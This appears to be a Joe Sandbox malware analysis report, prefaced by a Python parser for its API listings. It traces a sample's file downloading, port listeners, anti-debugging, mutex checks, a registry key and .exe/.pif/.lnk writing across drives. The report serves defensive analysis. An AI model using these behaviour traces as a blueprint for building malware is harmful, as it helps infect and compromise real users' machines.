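Added example, not part of this Joe Sandbox report and not Joe Sandbox's own tooling: a small Python parser for the "APIs" reference lines in these listings. It turns each `name.MODULE(args), ref: ADDR` entry into a record and decodes the constant arguments that identify the behaviour, which is what an analyst does by hand when reading them. For the WS2_32 listing above that means htons(0x0EDC) is port 3804, socket(2,2,0) is AF_INET/SOCK_DGRAM and setsockopt(..., 0xFFFF, 0x1002, ...) is SOL_SOCKET/SO_RCVBUF, so the thread binds a UDP listener on port 3804; the InternetOpenUrlA flags 0x84000000 (INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE) and CreateFileA(GENERIC_WRITE, CREATE_ALWAYS) from the WININET download routine in this report decode the same way. The sample input is constructed from lines on this page; the constant tables are from the public Windows SDK headers; the `bound_udp_port` heuristic is this example's own and not something the report computes.

```python
# Parse Joe Sandbox 'APIs' reference lines and decode the constant arguments
# that tell an analyst what a function does. Added example, not report code.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "• setsockopt.WS2_32(?,0000FFFF,...), ref: 01437B44"; "Sleep.KERNEL32 ref: 0143A374"
# has no argument list, and "Part of subcall function X:" is an optional prefix.
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
_HEX8 = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Constants from the public Windows SDK headers (winsock2.h, wininet.h, winnt.h).
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
SOCKOPT = {(0xFFFF, 0x0004): "SOL_SOCKET/SO_REUSEADDR", (0xFFFF, 0x0020): "SOL_SOCKET/SO_BROADCAST",
           (0xFFFF, 0x1001): "SOL_SOCKET/SO_SNDBUF", (0xFFFF, 0x1002): "SOL_SOCKET/SO_RCVBUF"}
WININET = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
           0x00800000: "INTERNET_FLAG_SECURE", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
           0x00000200: "INTERNET_FLAG_NO_UI"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                                   # address of the call site
    args: list = field(default_factory=list)   # int for hex words, str for literals, None for '?'
    subcall: Optional[int] = None              # callee address on "Part of subcall function" lines

def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None             # value not recovered by the sandbox
    if _HEX8.match(tok):
        return int(tok, 16)     # keep the leading '-' Joe prints for some pointers
    return tok                  # inline literal such as ".lnk" or "_Rar"

def parse_line(line: str) -> Optional[ApiCall]:
    m = _LINE.match(line)
    if not m:
        return None
    args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["api"], m["module"], int(m["ref"], 16), args, sub)

def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in map(parse_line, text.splitlines()) if c]

def _flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)  # bits the table does not name
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def annotate(c: ApiCall) -> str:
    """Decode the arguments that matter for triage; '' when nothing is decodable."""
    a = c.args
    try:
        if c.api == "htons":
            return f"port {a[0]}"                   # host-order port handed to htons
        if c.api == "socket":
            return f"{AF.get(a[0], a[0])} {SOCK.get(a[1], a[1])}"
        if c.api == "setsockopt":
            return SOCKOPT.get((a[1], a[2]), f"level={a[1]:#x} opt={a[2]:#x}")
        if c.api == "InternetOpenUrlA":
            return _flags(a[4], WININET)
        if c.api == "CreateFileA":
            return f"{_flags(a[1], ACCESS)} share={_flags(a[2], SHARE)} {DISPOSITION.get(a[4], a[4])}"
        if c.api in ("lstrcmpiA", "lstrcat", "lstrcpy"):
            lits = [x for x in a if isinstance(x, str)]
            return "literal " + ", ".join(lits) if lits else ""
    except (IndexError, TypeError):
        pass                                        # argument was '?' or missing; do not guess
    return ""

def bound_udp_port(calls: List[ApiCall]) -> Optional[int]:
    """Port bound by an IPv4 UDP socket when htons, socket(AF_INET, SOCK_DGRAM)
    and bind all appear in one listing; None otherwise. Heuristic of this example."""
    by_api = {c.api: c for c in calls}
    if {"htons", "socket", "bind"} <= by_api.keys() and by_api["socket"].args[:2] == [2, 2]:
        return by_api["htons"].args[0]
    return None

# Constructed input: reference lines copied from this report's listings.
SAMPLE = """\
• htons.WS2_32(00000EDC), ref: 01437AE9
• socket.WS2_32(00000002,00000002,00000000), ref: 01437B06
• setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 01437B44
• bind.WS2_32(?,00000002,00000010), ref: 01437B5A
  • Part of subcall function 0143A677: wsprintfA.USER32 ref: 0143A704
• InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 01440A4A
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 01440A7F
• lstrcat.KERNEL32(-014AB270,.lnk), ref: 0144132A
"""
```

Run `for c in parse_listing(SAMPLE): print(f"{c.ref:08X} {c.api:<18} {annotate(c)}")` to get one decoded line per call, and `bound_udp_port(parse_listing(SAMPLE))` returns 3804 for the sample. A `?` argument means the sandbox did not recover that value at run time, so `annotate` returns an empty string for it rather than guessing; the pointer-looking words (014326F0 and similar) are left as integers because the listing does not say what they point to.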
APIs
• lstrcpy.KERNEL32(?,?), ref: 014409A3
  • Part of subcall function 0143A677: GetTickCount.KERNEL32 ref: 0143A6C5
  • Part of subcall function 0143A677: GetTickCount.KERNEL32 ref: 0143A6E6
  • Part of subcall function 0143A677: lstrlen.KERNEL32(?,014326B8,00000000), ref: 0143A6F8
  • Part of subcall function 0143A677: wsprintfA.USER32 ref: 0143A704
• InternetOpenA.WININET(01432120,00000001,00000000,00000000,00000000), ref: 01440A18
• InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 01440A4A
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 01440A7F
• InternetReadFile.WININET(?,?,00000400,?), ref: 01440AA5
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01440AED
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01440B5D
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 01440B73
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 01440B89
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 999627789-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9bf43442b79ff3ce27d79f8a7868df03e107b76bb8ba04bdd306eb52faefd071
                                                                                                                                                                                                                                                                                            • Instruction ID: da65a1481fa096ad994fbeb36cf570ab20f7b3db976b0c0053026542da32a71b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bf43442b79ff3ce27d79f8a7868df03e107b76bb8ba04bdd306eb52faefd071
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76514E71900658ABEB34CF58CC48BEBB774AB44306F0045D9E309A72A0DBB45BD5CF95
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 014383EA
                                                                                                                                                                                                                                                                                            • htons.WS2_32(00000EC9), ref: 0143840B
                                                                                                                                                                                                                                                                                            • bind.WS2_32(000000FF,00000002,00000010), ref: 0143842C
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 014384A3
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014384AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3582385377-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 90d2c3843484f1980cd518a7f4ae27f2f416b35310876347873d957d7499148a
                                                                                                                                                                                                                                                                                            • Instruction ID: 95e159e06693e5c8260e6f68b753afd5ca412a960e6d155e62d4fa1288c70145
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d2c3843484f1980cd518a7f4ae27f2f416b35310876347873d957d7499148a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97313474A00306EBDB20DFF49909BAEFA74AB9C710F14472EF715A66E0E6744601CB55
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNEL32(00000009,?), ref: 00AB13E5
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00AB1409
                                                                                                                                                                                                                                                                                            • EnumWindows.USER32(00AB1081,00000000), ref: 00AB144A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00AB1468
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CheckDebuggerEnumPresentRemoteWindows
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 13200330-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 63a4e7c00cc56fce5944bb0ea1f1357f4660c7e8664a70e2c98d3443b44d5ba4
                                                                                                                                                                                                                                                                                            • Instruction ID: 48c174c575f236f60619d9928181fa13ff5184a0d0bf6ed09e98052310ea4a9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63a4e7c00cc56fce5944bb0ea1f1357f4660c7e8664a70e2c98d3443b44d5ba4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 903198B1C05308AEEF14AFE0DA56AEDBBBCEF40314FA00559E411AA183DB355B81CB54
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000018,?,00000000,00000001), ref: 00AB590B
                                                                                                                                                                                                                                                                                            • Module32FirstW.KERNEL32(00000000,?), ref: 00AB5951
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 1db3b405ea79af3646c1d27bc8d4350b12789e9677a9c1ea50c85ef15eeb3989
• Instruction ID: 62954497601059d090d95f33bdd3f07e4b9c572a7f66f4e11c5d04b4cec244cb
• Opcode Fuzzy Hash: 1db3b405ea79af3646c1d27bc8d4350b12789e9677a9c1ea50c85ef15eeb3989
• Instruction Fuzzy Hash: F6F04972A02624B9EA5067746C86FEE339C8B05330FA0014AF665AB0C3DD209A845AB4
APIs
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 622435efe4e8f8acd0a7fa5d890bdd82c32cdda1048d5db10fb3163eee9e2296
• Instruction ID: 9803f699861662bfcbd94db845c5a64749ba8fa4ba07e3a7f333980791510649
• Opcode Fuzzy Hash: 622435efe4e8f8acd0a7fa5d890bdd82c32cdda1048d5db10fb3163eee9e2296
• Instruction Fuzzy Hash: 4411E2B3A005154BEB1CDF65AC5AD76B392EBE4354317412EE5269B292CAB06943C7C0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 613 1443062-1443188 call 1448060 call 14344cb Sleep call 1442fff 620 144318b-14431a5 call 143e329 613->620 623 14431b4-14431be 620->623 624 14431a7-14431b2 Sleep 620->624 625 1443744-1443777 RtlExitUserThread 623->625 626 14431c4-14431ce 623->626 624->620 626->625 628 14431d4-14431e0 626->628 628->625 629 14431e6-14431f3 628->629 629->625 630 14431f9-1443200 629->630 630->625 631 1443206-144324e call 1442ebc Sleep GetLogicalDrives 630->631 635 1443734-144373f Sleep 631->635 636 1443254-1443272 631->636 635->630 637 144372f 636->637 638 1443278-14432b6 GetDriveTypeA 636->638 637->635 638->637 639 14432bc-14432f9 lstrcat CreateFileA 638->639 640 1443522-144353c GetFileAttributesA 639->640 641 14432ff-1443337 GetFileTime FileTimeToSystemTime 639->641 644 144353e-1443566 SetFileAttributesA DeleteFileA call 143a2ad 640->644 645 1443569-1443592 CreateFileA 640->645 642 1443515-144351c CloseHandle 641->642 643 144333d-1443359 641->643 642->640 643->642 647 144335f-14433b4 call 1434060 ReadFile CharLowerA lstrlen 643->647 644->645 645->637 646 1443598-144361d GetSystemTime SystemTimeToFileTime call 143a16b call 14344cb 645->646 659 1443633-144363f lstrcat 646->659 660 144361f-1443631 lstrcat 646->660 655 1443510 647->655 656 14433ba-14433d7 call 1438deb 647->656 655->642 656->655 663 14433dd-14433f0 656->663 662 1443645-14436ed call 1442b8e lstrlen WriteFile SetFileTime CloseHandle SetFileAttributesA CreateFileA 659->662 660->662 662->637 670 14436ef-1443729 WriteFile CloseHandle SetFileAttributesA 662->670 663->655 666 14433f6-14433ff 663->666 668 1443405-1443417 666->668 669 144350b 666->669 671 1443422-1443425 668->671 672 1443419-144341f 668->672 669->655 670->637 673 144342b-1443437 671->673 672->671 674 1443465-144348f lstrcpy GetFileAttributesA 673->674 675 1443439-1443445 673->675 676 1443491-14434c7 CloseHandle CreateFileA 674->676 677 1443509 674->677 675->674 678 1443447-1443452 675->678 676->677 679 14434c9-1443503 WriteFile CloseHandle SetFileAttributesA 676->679 677->655 678->674 680 1443454-1443463 678->680 679->677 680->673
APIs
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• Sleep.KERNEL32 ref: 01443176
  • Part of subcall function 01442FFF: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144302B
  • Part of subcall function 01442FFF: WriteFile.KERNEL32(000000FF,014126B0,00000401,00000000,00000000), ref: 0144304E
  • Part of subcall function 01442FFF: CloseHandle.KERNEL32(000000FF), ref: 01443058
• Sleep.KERNEL32(00004E20), ref: 014431AC
• Sleep.KERNEL32(00004E20), ref: 01443210
• GetLogicalDrives.KERNEL32 ref: 01443220
• GetDriveTypeA.KERNEL32(?), ref: 014432A3
• lstrcat.KERNEL32(?,01432740), ref: 014432CA
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 014432E6
• GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0144331B
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0144332F
• ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01443391
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: File$SleepTime$Create$CloseDriveDrivesExchangeHandleInterlockedLogicalReadSystemTypeWritelstrcat
• String ID: .exe$.pif$:$\
• API String ID: 2892063643-4138429844
• Opcode ID: 5f207cc4a8cf9ae37a751f76d25b93cee4ff79ee5640322015a40a45b27ea234
• Instruction ID: eb94ed736681641e991c47ef4a072695018d8f8333a7afd0c719d37e20decaa3
• Opcode Fuzzy Hash: 5f207cc4a8cf9ae37a751f76d25b93cee4ff79ee5640322015a40a45b27ea234
• Instruction Fuzzy Hash: D902A1B5D002689BEB34DF64CC88BEABB75BF49B00F0081D9E349E6294D7749A94CF50

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01442545
• Process32First.KERNEL32(00000000,00000128), ref: 01442584
• lstrlen.KERNEL32(?,00000002,00000000), ref: 014425A5
• lstrcpyn.KERNEL32(00000000,?,00000040), ref: 014425C0
• lstrcpy.KERNEL32(00000000,?), ref: 014425D6
• CharLowerA.USER32(00000000), ref: 014425E3
• lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 014425FC
• wsprintfA.USER32 ref: 0144260A
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0144261E
• GetLastError.KERNEL32 ref: 0144262A
• ReleaseMutex.KERNEL32(?), ref: 0144263D
• CloseHandle.KERNEL32(?), ref: 0144264A
                                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0144267D
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 0144269E
                                                                                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 014426B9
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 014426CF
                                                                                                                                                                                                                                                                                            • CharLowerA.USER32(00000000), ref: 014426DC
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 014426F5
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01442703
                                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 01442717
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01442723
                                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 01442736
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01442743
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01442774
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Mutexlstrlen$CloseCreateHandle$CharErrorLastLowerProcess32Releaselstrcpylstrcpynwsprintf$FirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: M_%d_$M_%d_
                                                                                                                                                                                                                                                                                            • API String ID: 3105503624-485321427
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c03f681cb0eb1a651620c69c1b3fee3ae2370932665380d98481b17149f6d66
                                                                                                                                                                                                                                                                                            • Instruction ID: 05becb6e03bcb85b771cb2b5dcc44d5a100de560ebef21816287279c395e6533
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c03f681cb0eb1a651620c69c1b3fee3ae2370932665380d98481b17149f6d66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3512EB5900218ABEB30DBB4EC88FDAB778AB68701F1045D9E749A6154DBB49BC4CF50

Control-flow Graph

APIs
• lstrcpy.KERNEL32(00000000,Software\Hwdq), ref: 01434E54
• lstrlen.KERNEL32(00000000,\%d,616E6974), ref: 01434E78
• wsprintfA.USER32 ref: 01434E86
• RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01434EA9
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01434ECA
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CreateOpenlstrcpylstrlenwsprintf
• String ID: Software\Hwdq$\%d$userC:\Windows\
• API String ID: 4004410694-1901203423
• Opcode ID: 5231963d5c956d207c35925de7ee2e774dddd74cec3f31780d6da0573fc64bc7
• Instruction ID: c8b1a85a667380f075b771899e2335db79210d2e2fd69166be1bc35857435471
• Opcode Fuzzy Hash: 5231963d5c956d207c35925de7ee2e774dddd74cec3f31780d6da0573fc64bc7
• Instruction Fuzzy Hash: 990281B5901218DBDB24DF64DC44FE9B778BB9C704F0842DAE619AB290DB729B84CF50

Control-flow Graph

APIs
• Sleep.KERNEL32(0001D4C0), ref: 01439EFE
• Sleep.KERNEL32(00001000), ref: 01439F0B
• LoadLibraryA.KERNEL32(014327C0), ref: 01439F4D
• GetProcAddress.KERNEL32(00000000,014327D0), ref: 01439F6A
• GetProcAddress.KERNEL32(00000000,014327E0), ref: 01439F8E
• GetProcAddress.KERNEL32(00000000,014327F0), ref: 01439FB2
• RtlExitUserThread.NTDLL(00000000), ref: 0143A14B
Strings
Memory Dump Source
